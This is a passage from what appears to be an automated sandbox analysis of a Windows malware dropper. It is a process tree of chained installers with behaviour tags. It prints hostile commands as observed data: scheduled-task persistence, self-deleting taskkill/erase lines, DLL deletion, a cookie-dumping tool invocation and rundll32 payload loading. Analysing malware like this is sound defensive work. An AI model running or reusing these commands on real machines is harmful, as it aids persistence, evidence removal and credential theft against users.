                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Poi.vsd
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5548
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd
                                                                                                                                                              8⤵
                                                                                                                                                                PID:5888
                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                  findstr /V /R "^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$" Che.vsd
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:6044
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                                                    Dare.exe.com D
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:5400
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:2476
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping 127.0.0.1 -n 30
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:5988
                                                                                                                                                                • C:\Users\Admin\Documents\xI4457zOa8vUhxxaKZrfXXVE.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\xI4457zOa8vUhxxaKZrfXXVE.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:2648
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-8QK91.tmp\xI4457zOa8vUhxxaKZrfXXVE.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-8QK91.tmp\xI4457zOa8vUhxxaKZrfXXVE.tmp" /SL5="$401F0,28982256,486912,C:\Users\Admin\Documents\xI4457zOa8vUhxxaKZrfXXVE.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:4896
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_8.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:2144
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_8.exe
                                                                                                                                                                    sonia_8.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:3308
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_9.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:2120
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_9.exe
                                                                                                                                                                    sonia_9.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:184
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_9.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_9.exe
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:3036
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_10.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:3884
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_10.exe
                                                                                                                                                                      sonia_10.exe
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:3536
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\pMbUGPzeKR4ze5fizSRXy32i.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\pMbUGPzeKR4ze5fizSRXy32i.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4496
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "owegj" /tr '"C:\Users\Admin\AppData\Roaming\owegj.exe"' & exit
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:5544
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "owegj" /tr '"C:\Users\Admin\AppData\Roaming\owegj.exe"'
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                              PID:4232
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB8E1.tmp.bat""
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:4560
                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                timeout 3
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:5736
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\owegj.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\owegj.exe"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5992
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2KD2Vz4vT2VR78eOY6mqr5UD.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2KD2Vz4vT2VR78eOY6mqr5UD.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              PID:4572
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.exe
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:4756
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\mQk3qRd60AKBYNWaJqZ09pVZ.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\mQk3qRd60AKBYNWaJqZ09pVZ.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:4144
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\mQk3qRd60AKBYNWaJqZ09pVZ.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\mQk3qRd60AKBYNWaJqZ09pVZ.exe" -a
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:1216
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "sonia_10.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_10.exe" & exit
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:2236
                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                      taskkill /im "sonia_10.exe" /f
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:4436
                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:1592
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:4604
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-B8TRG.tmp\sonia_5.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-B8TRG.tmp\sonia_5.tmp" /SL5="$40064,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS03E24084\sonia_5.exe"
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:1172
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-V64GN.tmp\JFHGSFGSIUGFSUIG.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-V64GN.tmp\JFHGSFGSIUGFSUIG.exe" /S /UID=burnerch2
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:4348
                                                                                                                                                                            • C:\Program Files\Windows Defender\GSDASSWZLE\ultramediaburner.exe
                                                                                                                                                                              "C:\Program Files\Windows Defender\GSDASSWZLE\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5452
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-H9MP4.tmp\ultramediaburner.tmp
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-H9MP4.tmp\ultramediaburner.tmp" /SL5="$30246,281924,62464,C:\Program Files\Windows Defender\GSDASSWZLE\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:4568
                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:940
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\c2-a2886-d0a-69e8f-13b63e03a6c4e\Kukifizhozhy.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\c2-a2886-d0a-69e8f-13b63e03a6c4e\Kukifizhozhy.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4544
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\74-23344-a96-d189b-92ff7143e057c\Salavosyxy.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\74-23344-a96-d189b-92ff7143e057c\Salavosyxy.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5620
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zc44lc2d.ncc\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:7004
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t2vz1gcl.whx\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:6152
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mauby4v5.njz\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3212
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\mauby4v5.njz\Setup3310.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\mauby4v5.njz\Setup3310.exe /Verysilent /subid=623
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:6760
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-8UG2K.tmp\Setup3310.tmp
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-8UG2K.tmp\Setup3310.tmp" /SL5="$30480,138429,56832,C:\Users\Admin\AppData\Local\Temp\mauby4v5.njz\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:7000
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-440PF.tmp\Setup.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-440PF.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:6392
                                                                                                                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:7048
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:8080
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:8292
                                                                                                                                                                                                                  • C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:7040
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-23R39.tmp\MediaBurner.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-23R39.tmp\MediaBurner.tmp" /SL5="$3056A,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:6780
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-J0KVP.tmp\_____________bob.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-J0KVP.tmp\_____________bob.exe" /S /UID=burnerch1
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:8524
                                                                                                                                                                                                                              • C:\Program Files\7-Zip\UGNYKPMDAR\ultramediaburner.exe
                                                                                                                                                                                                                                "C:\Program Files\7-Zip\UGNYKPMDAR\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                  PID:8316
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LJ4E7.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LJ4E7.tmp\ultramediaburner.tmp" /SL5="$40464,281924,62464,C:\Program Files\7-Zip\UGNYKPMDAR\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                      PID:8708
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8a-53d69-30d-b6083-c9a71f0523f9e\Bekoxaekuqae.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\8a-53d69-30d-b6083-c9a71f0523f9e\Bekoxaekuqae.exe"
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:8892
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\55-a7bf9-190-5f48e-97c9059cc419e\Welojokaeba.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\55-a7bf9-190-5f48e-97c9059cc419e\Welojokaeba.exe"
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:9004
                                                                                                                                                                                                                                • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:7052
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6018505.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6018505.exe"
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:7576
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1063466.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\1063466.exe"
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                          PID:7968
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1927303.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1927303.exe"
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                            PID:7020
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:7116
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                PID:5416
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                  taskkill /im RunWW.exe /f
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                  PID:8588
                                                                                                                                                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                                                                                                                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:200
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-3CFRK.tmp\lylal220.tmp
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-3CFRK.tmp\lylal220.tmp" /SL5="$20552,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                    PID:6904
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-ON094.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-ON094.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal220
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:8468
                                                                                                                                                                                                                                                        • C:\Program Files\Windows Media Player\JTMCHJODCE\irecord.exe
                                                                                                                                                                                                                                                          "C:\Program Files\Windows Media Player\JTMCHJODCE\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                            PID:8412
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-ETCCU.tmp\irecord.tmp
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-ETCCU.tmp\irecord.tmp" /SL5="$3059A,5808768,66560,C:\Program Files\Windows Media Player\JTMCHJODCE\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                PID:8968
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                    PID:5412
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1f-2252f-812-e3499-b97c9d885a331\Syshatylajae.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1f-2252f-812-e3499-b97c9d885a331\Syshatylajae.exe"
                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                  PID:9120
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7f-e8b66-f23-1808f-68fc69a04dcce\Tukaevumapo.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7f-e8b66-f23-1808f-68fc69a04dcce\Tukaevumapo.exe"
                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                    PID:4664
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe"
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:5432
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                      PID:7344
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:6380
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-4L4JU.tmp\LabPicV3.tmp
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-4L4JU.tmp\LabPicV3.tmp" /SL5="$3040A,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                          PID:5500
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-ON095.tmp\12(((((.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-ON095.tmp\12(((((.exe" /S /UID=lab214
                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                              PID:8484
                                                                                                                                                                                                                                                                              • C:\Program Files\Internet Explorer\EYJPCLOZLP\prolab.exe
                                                                                                                                                                                                                                                                                "C:\Program Files\Internet Explorer\EYJPCLOZLP\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                  PID:8976
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-5E92A.tmp\prolab.tmp
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-5E92A.tmp\prolab.tmp" /SL5="$4045C,575243,216576,C:\Program Files\Internet Explorer\EYJPCLOZLP\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                      PID:7916
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\27-e428b-2ee-8b0ab-c2a17bc6ad5ec\Qetaeroraela.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\27-e428b-2ee-8b0ab-c2a17bc6ad5ec\Qetaeroraela.exe"
                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                      PID:9064
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\b9-c9711-bc6-4879c-a1e4d03fe1cc0\Kopifaeludae.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\b9-c9711-bc6-4879c-a1e4d03fe1cc0\Kopifaeludae.exe"
                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                        PID:5676
                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vjnvshaa.omz\google-game.exe & exit
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:7128
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vjnvshaa.omz\google-game.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\vjnvshaa.omz\google-game.exe
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:5840
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vjnvshaa.omz\google-game.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\vjnvshaa.omz\google-game.exe" -a
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:6988
                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\muzljozg.v5v\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:764
                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22psokyh.hdn\toolspab1.exe & exit
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:6916
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22psokyh.hdn\toolspab1.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22psokyh.hdn\toolspab1.exe
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:5784
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22psokyh.hdn\toolspab1.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22psokyh.hdn\toolspab1.exe
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                            PID:6888
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\llqcmpzn.v5a\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:7584
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\llqcmpzn.v5a\SunLabsPlayer.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\llqcmpzn.v5a\SunLabsPlayer.exe /S
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:7304
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst5775.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                  PID:6916
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        PID:5600
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:5624
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:4784
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:6812
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:7940
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
